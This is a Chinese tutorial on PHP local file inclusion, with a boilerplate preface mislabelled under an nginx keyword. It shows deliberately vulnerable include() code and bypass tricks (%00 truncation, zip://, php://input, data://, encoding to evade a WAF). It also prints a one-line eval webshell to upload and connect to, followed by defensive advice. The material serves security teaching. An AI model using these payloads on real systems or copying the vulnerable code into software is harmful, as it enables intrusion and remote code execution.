前言:
今天看官们对“nginx静态与动态”都比较关心,小伙伴们都需要分析一些“nginx静态与动态”的相关文章。那么小编在网络上网罗了一些关于“nginx静态与动态””的相关内容,希望你们能喜欢,兄弟们快快来学习一下吧!0x00:漏洞定义
在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。
文件包含分为两种,一种为本地文件包含,一种为远程文件包含,此篇记录本地文件包含。本地文件包含(Local File Include),简称 LFI。
0x01:涉及函数
文件包含在 php 中,涉及到的危险函数有四个,分别是 include()、include_once()、require()、require_once()。
区别如下:
include:包含并运行指定的文件,包含文件发生错误时,程序警告,但会继续执行。
include_once:和 include 类似,不同处在于 include_once 会检查这个文件是否已经被导入,如果已导入,下文便不会再导入,直面 once 理解就是只导入一次。
require:包含并运行指定的文件,包含文件发生错误时,程序直接终止执行。
require_once:和 require 类似,不同处在于 require_once 只导入一次。
0x02:产生场景
开发过程中,多个文件都会用到的代码,通常会放到一个单独的文件中,用到时再包含进来。当把包含的文件写死在程序中时,该漏洞是不存在的,但很多情况都会动态的去包含所需的文件,这时候则会产生文件包含漏洞。
0x03:简单示例
以下代码是最简单的一个文件包含示例,程序没有对要包含的文件进行验证,导致可控。
<?php $file = $_GET['file']; if(isset($file)){ include("$file"); }else{ echo "file fail"; }
因为文件路径可控,当输入系统的密码文件所在路径时,内容会输出出来,如下图:
这样的代码过于危险,所以很少有人这么写,但有些防护措施是很差的,例如通过替换../, 代码如下:
$file=str_replace('../','',$_GET['file']);if(isset($file)){ include("$file");}else{ echo "file fail";}
通过检测../ 然后替换为空,上一种情况是通过../ 定位到根目录的,当../ 被过滤后,可以直接通过 / 定位,如下图:
有时的程序也会通过添加后缀来做防护措施,例如如下代码:
$file=str_replace('../','',$_GET['file']);if(isset($file)){ include("$file" . "php");}else{ echo "file fail";}
这个可以通过 %00 截断来绕过,但要注意,是老版本了,php5.2.x 的测试可以,php5.3.x 的测试不行,而且 php.ini 中的 magic_quotes_gpc 配置项为 off 时,才可以。magic_quotes_gpc 是用来转义特殊字符的,开启后 %00 会被转义,这个可以做下了解,毕竟老版本用的比较少了。测试结果如下图(win):
新建一个 txt 文件,内容为 <? phpinfo(); ?>
php5.2.17 测试结果:
当把 magic_quotes_gpc 设置为 on 时,%00 会被转义,结果如下:
当把 php 版本切换为 php5.3.29 时,测试不通过,结果如下:
顺便提一下,为什么 %00 能截断,PHP 内核是 C 实现的,使用了 C 中的字符处理函数,在连接字符串时,0 字节也就是 x00 会作为结束符,所以只要加入一个 0 字节,就可以截断字符串,0 经过 URL 编码后为 %00。
对于 %00 截断可以通过以上几个图的提示来判断出 php 的版本或是否开启了 magic_quotes_gpc 配置项,能迅速查出原因即可。
当 %00 不能截断时,在 win 系统中,可以利用 php 的 zip:// 协议,例如:写一个 hello.php,内容为 <?php phpinfo();?>,然后压缩成文件 test.zip 并上传,随后在系统中输入 localhost/test.php?file=zip://test.zip%23hello 即可,因为程序有后缀措施,这样参数 file 实际就变成了 zip://test.zip#23hello.php,意思为读取 test.zip 中的 hello.php 文件内容,如下图:
0x04:利用示例
1,如果存在本地文件包含漏洞时,不论包含 txt 还是 jpg,程序都会以 php 来解析运行,也就意味着可以上传一句话木马,直接用菜刀连接。
例如新建一个 1.txt 内容为:
<?php @eval($_POST['caidao']);?>
随后将后缀改为 jpg,利用文件包含漏洞包含此文件,结果如下:
2,可以利用 php://input 输入流执行任意命令,前提是 php.ini 的 allow_url_include 项设置为 on,不受版本控制,例如以下操作图:
使用火狐插件 hackbar 即可。
3,利用 php 的数据协议 data:// 可以查看文件源代码,前提是 php.ini 中的 allow_url_fopen 和 allow_url_include 两个配置为 on, 例如以下操作图:
当碰到 WAF 时,可以把 <> 这些特殊符号进行编码再试。
0x05: 如何防御
1,尽量不使用动态包含文件,如果可以静态的去包含最好。
2,在使用动态包含时,添加后缀措施的情况下,请保证 php 版本高于 5.3 或是最新版,防止截断攻击。
3,对于动态包含的文件可以设置一个白名单,如果不属于白名单内的文件名,则不包含。
4,可以使用 open_basedir 限制目录项来指定包含的目录范围,防止目录遍历,php.ini 中设置 open_basedir="指定目录"。
5,对于中间件 apache 或 nginx 等,可以使用中间件自身的指定目录范围配置,效果更好。
标签: #nginx静态与动态